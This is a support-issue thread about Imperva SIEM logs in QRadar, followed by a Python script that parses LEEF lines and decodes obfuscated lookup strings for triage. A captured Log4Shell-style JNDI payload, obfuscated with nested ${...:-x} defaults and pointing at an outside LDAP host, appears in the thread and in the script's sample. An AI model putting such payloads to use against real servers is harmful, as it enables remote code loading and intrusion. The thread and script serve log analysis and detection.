Closed. manimmt closed this issue 4 months ago.
@manimmt do you know if you are using the masking feature in the general settings? I have not seen this issue before. Is the entire log like this, or just some of it? https://docs.imperva.com/bundle/cloud-application-security/page/website-general-settings.htm
We are not using any mask. Some parts of the logs are like this, and other logs are completely OK. Also, we are using the beta script downloaded last year. This issue was observed recently.
Thanks for the feedback @manimmt. One of my colleagues, @AaronSeibert, brought it to my attention that this might be an injection payload (attack). Can you read the beginning of the CEF entry and see if it's NORMAL or other? CEF:0|Incapsula|SIEMintegration|1|1|Normal|0|
The beginning of the payload seems normal. Refer below. (xxxx typed manually here to hide info)
<30> Feb 17 16:37:12 xxxx cwaf LEEF:1.0|Incapsula|SIEMintegration|1.0|Illegal Resource Access| fileId=xxxx sourceServiceName=xxxx siteid=xxxx suid=xxxx requestClientApplication=${${c:xf:tk:-j}${riom:h9gj:-n}${aif
@manimmt - This is an Illegal Resource Access security event, so this represents the fact that the platform recognized the malicious value of the requestClientApplication parameter, and the logging is working fine. It just looks strange because it is an injection attempt.
We are getting this strange format in the QRadar SIEM tool. Please let me know what needs to be done.
requestClientApplication=${${fg2:fi:wa:-j}${mr:b:qe3p:-n}${x3:pvm:-d}${mby:m:-i}${tru:-:}${m:0ony:cv:-l}${6:-d}${k0ly:-a}${ax9e:c4h:-p}${cj8:-:}${6:-/}${epz:-/}${5ew:-U}${ni8:947:e:-A}${7u:r:v:-l}${v:to:6m:-0}${m:7w:8dzg:-c}${2c3e:h90:--}${${zj8q:4y:1:-s}${uxb:h2b:i:-y}${gxa8:ql7:r3:-s}${b:2:-:}${ib:u:o0bc:-j}${zu:-a}${d:ial:-v}${n1:jq:-a}$
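As an added example that is not part of the thread or of the Imperva integration script, the Python below parses the LEEF line posted above, flags the requestClientApplication value as an obfuscated lookup, and resolves the ${name:-default} tokens so an analyst can read what the value spells out without evaluating anything. The sample line is reassembled from the two excerpts in the thread, and whitespace-separated attributes are an assumption (real LEEF feeds normally use a tab delimiter).

```python
import re

# Sample input reassembled from the thread: the LEEF header of the first
# excerpt plus the requestClientApplication value of the second. "xxxx" are
# the reporter's redactions; the value ends where the post truncated it.
SAMPLE = (
    "<30> Feb 17 16:37:12 xxxx cwaf LEEF:1.0|Incapsula|SIEMintegration|1.0|"
    "Illegal Resource Access| fileId=xxxx sourceServiceName=xxxx siteid=xxxx "
    "suid=xxxx requestClientApplication="
    "${${fg2:fi:wa:-j}${mr:b:qe3p:-n}${x3:pvm:-d}${mby:m:-i}${tru:-:}"
    "${m:0ony:cv:-l}${6:-d}${k0ly:-a}${ax9e:c4h:-p}${cj8:-:}${6:-/}${epz:-/}"
    "${5ew:-U}${ni8:947:e:-A}${7u:r:v:-l}${v:to:6m:-0}${m:7w:8dzg:-c}"
    "${2c3e:h90:--}${${zj8q:4y:1:-s}${uxb:h2b:i:-y}${gxa8:ql7:r3:-s}${b:2:-:}"
    "${ib:u:o0bc:-j}${zu:-a}${d:ial:-v}${n1:jq:-a}$"
)

# Innermost ${name:-default} token: no nested braces, and a ":-" default.
DEFAULT_TOKEN = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")

def parse_leef(line):
    """Split a LEEF 1.0 line into header fields and key=value attributes.
    Assumes whitespace-separated attributes as in the excerpts above; real
    LEEF feeds normally use a tab delimiter."""
    parts = line[line.index("LEEF:"):].split("|", 5)
    header = dict(zip(("version", "vendor", "product", "product_version", "event_id"), parts[:5]))
    attrs = {}
    for item in re.split(r"\s+(?=\w+=)", parts[5].strip()):
        key, _, value = item.partition("=")
        attrs[key] = value
    return header, attrs

def has_lookup_obfuscation(value):
    """Nested ${...} lookups with ":-" defaults, the pattern seen in the thread."""
    return value.count("${") >= 2 and ":-" in value

def resolve_defaults(value, max_rounds=20):
    """Replace each ${name:-default} token with its default, innermost first,
    so the value becomes readable; nothing is looked up or evaluated."""
    for _ in range(max_rounds):
        value, n = DEFAULT_TOKEN.subn(lambda m: m.group(1), value)
        if n == 0:
            break
    return value

def triage(line):
    """Return {field: resolved value} for each attribute that looks injected."""
    _, attrs = parse_leef(line)
    return {k: resolve_defaults(v) for k, v in attrs.items()
            if has_lookup_obfuscation(v)}
```

Calling triage(SAMPLE) returns the flagged field with its resolved value, which is what to key a SIEM rule or custom property on rather than the raw obfuscated string.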